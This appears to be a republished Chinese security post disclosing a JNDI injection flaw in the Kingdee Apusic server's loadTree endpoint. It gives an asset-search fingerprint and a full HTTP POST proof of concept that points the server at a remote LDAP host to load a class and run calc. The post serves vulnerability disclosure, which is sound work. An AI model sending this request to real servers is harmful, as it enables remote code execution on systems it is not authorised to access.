当前位置: 首页 > news >正文

金蝶Apusic应用服务器 loadTree JNDI注入漏洞

产品介绍

金蝶Apusic是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。

漏洞概述

由于金蝶Apusic应用服务器权限验证不当,使用较低JDK版本,导致攻击者可以向loadTree接口执行JNDI注入,远程加载恶意类,造成远程代码执行。

资产测绘

app.name=“Apusic 金蝶天燕 Server”

漏洞复现

在这里插入图片描述
测试POC:

POST /appmonitor/protect/jndi/loadTree HTTP/1.1
Host: your_ip
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 55jndiName=ldap://***.***.***.***/Basic/Command/calc

弹出计算器进行验证
在这里插入图片描述

修复建议

官方已发布漏洞补丁,请联系软件厂商进行修复。

http://www.lryc.cn/news/274267.html

相关文章:

  • 计算机毕业设计 基于SpringBoot的公司资产网站的设计与实现 Java实战项目 附源码+文档+视频讲解
  • 如何获取时间戳?
  • Vue页面传值:Props属性与$emit事件的应用介绍
  • 【mars3d】new mars3d.layer.GeoJsonLayer(实现环状面应该怎么传data
  • Websocket实时更新商品信息
  • 数据结构第六弹---带头双向循环链表
  • 洛谷——P1347 排序(图论-拓扑排序)
  • JVM内存管理
  • 将 Python 和 Rust 融合在一起,为 pyQuil® 4.0 带来和谐
  • Spring Boot应用程序中VO的理解及使用
  • 华为交换机ETH-TRUNK链路聚合lacp模式与手工模式
  • 函数图像化
  • gnu工程的编译 - 以libiconv为例
  • 在 CentOS 7.8 上安装 Node.js
  • 【数据分析实战】冰雪大世界携程景区评价信息情感分析采集词云
  • BIND-DNS配置介绍
  • Python技巧
  • 几种常见的CSS三栏布局?介绍下粘性布局(sticky)?自适应布局?左边宽度固定,右边自适应?两种以上方式实现已知或者未知宽度的垂直水平居中?
  • 箭头函数 - JavaScript的新宠儿
  • 操作系统期末复习知识点
  • [英语学习][23][Word Power Made Easy]的精读与翻译优化
  • 吉林大学19、21级计算机学院《计算机网络》期末真题试题
  • python练习3【题解///考点列出///错题改正】
  • LINUX服务器防火墙nf_conntrack问题一例
  • 经典八股文之RocketMQ
  • Pandas之从sql库中导入数据的几种方法分析
  • 18. Mysql 存储过程,实现动态数据透视
  • VuePress部署到GitHub Pages
  • git 本地仓库
  • Hive实战:分科汇总求月考平均分